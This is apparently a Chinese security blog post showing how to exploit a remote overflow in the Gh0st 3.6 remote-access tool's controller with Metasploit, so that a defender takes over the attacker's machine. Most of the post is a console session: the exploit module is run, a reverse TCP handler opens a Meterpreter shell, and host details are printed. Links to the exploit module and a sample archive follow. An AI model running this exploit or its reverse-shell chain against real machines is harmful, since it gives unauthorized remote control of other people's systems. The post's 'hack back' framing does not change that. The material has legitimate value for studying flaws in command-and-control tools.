logo

K8哥哥

没有绝对安全的系统

利用Gh0st 3.6远程溢出漏洞反向控制攻击者

本文于 317 天之前发表

前言

漏洞验证在2017年被公开,实际上Gh0st溢出漏洞在2009年时就已被人爆出过多个
可见使用开源C2工具,不见得安全,最好是经过二次修改,单纯做免杀可防不了哦

MSF

Teston WinXP at 2017-09-15
运行Gh0st客户端,然后通过MSF溢出C2客户端机器,即可反向获取攻击者机器权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set RHOST 192.168.1.126
RHOST => 192.168.1.126
msf exploit(gh0st) > run

[*] Started reverse TCP handler on 192.168.1.125:4444
[*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6
[*] 192.168.1.126:80 - Spraying heap...
[*] 192.168.1.126:80 - Trying command 103...
[*] Sending stage (957999 bytes) to 192.168.1.126
[*] Meterpreter session 1 opened (192.168.1.125:4444 -> 192.168.1.126:1070) at 2017-09-15 16:22:56 +0800
[*] 192.168.1.126:80 - Server closed connection

meterpreter > sysinfo
Computer : K8ANTI-B2B9B81C
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >

EXP

https://github.com/rapid7/metasploit-framework/blob/be66ed8af3c355b1280e1a2bdbe5dd1a74e7bc58/modules/exploits/windows/misc/gh0st.rb

https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip

扫码加入K8小密圈